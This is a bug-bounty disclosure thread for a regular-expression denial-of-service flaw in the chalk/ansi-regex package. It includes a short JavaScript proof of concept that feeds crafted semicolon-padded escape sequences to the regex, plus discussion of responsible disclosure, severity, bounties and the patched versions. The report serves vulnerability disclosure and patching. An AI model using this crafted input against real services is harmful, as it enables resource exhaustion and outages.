Inefficient Regular Expression Complexity in chalk/ansi-regex

Valid

Reported on

Sep 9th 2021


✍️ Description

It allows cause a denial of service when matching crafted invalid ANSI escape codes.

🕵️‍♂️ Proof of Concept

// PoC.mjs
import ansiRegex from 'ansi-regex';


for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurrences

Yeting Li submitted a
10 months ago
Yeting Li
10 months ago

Researcher


Hi @admin, could you help me contact the maintainer to confirm the vulnerability and patch?

Z-Old
10 months ago

Admin


Hey Yeting, of course. I've just sent security@tidelift.com an email, as per their security policy. I'll update you when we hear back from them.

We have contacted a member of the chalk/ansi-regex team and are waiting to hear back 10 months ago
Yeting Li
10 months ago

Researcher


Hi Ziding @admin, thanks for your efforts. The maintainer has now confirmed my disclosure and patch (see the commit).

chalk/ansi-regex maintainer
10 months ago

@yetingli This is the second time you have been told to do a responsible closure. That means not submitting a pull request or open an issue until the report has been validated.

The severity (and IMHO bounty) in this report is also too high. The issue affects pretty much no one as ansi-regex is mostly used for command-line tools, not in servers.

Yeting Li
10 months ago

Researcher


Thank you for your reply@Sindre Sorhus. I just did a responsible closure on huntr.dev, but I accidentally pulled when I submitted the patch. Thank you again for your reminder!

Yeting Li
10 months ago

Researcher


The bounty setting may be related to the popularity of the project? I'm not sure, you@Sindre Sorhus can ask @admin?

chalk/ansi-regex maintainer validated this vulnerability 9 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
chalk/ansi-regex maintainer confirmed that a fix has been merged on 8d1d7c 9 months ago
Yeting Li has been awarded the fix bounty
index.js#L3 has been validated
chalk/ansi-regex maintainer
9 months ago

Fixed in:

  • 6.0.1: https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
  • 5.0.1: https://github.com/chalk/ansi-regex/releases/tag/v5.0.1
Jamie Slome
9 months ago

Admin


CVE published! 🎉

Yeting Li
9 months ago

Researcher


Thanks.

Thayol
2 months ago

We also have:

4.1.1: https://github.com/chalk/ansi-regex/releases/tag/v4.1.1

This is a tag without a release. It includes the same fix as 5.0.1 and 6.0.1 (https://github.com/chalk/ansi-regex/pull/37)

to join this conversation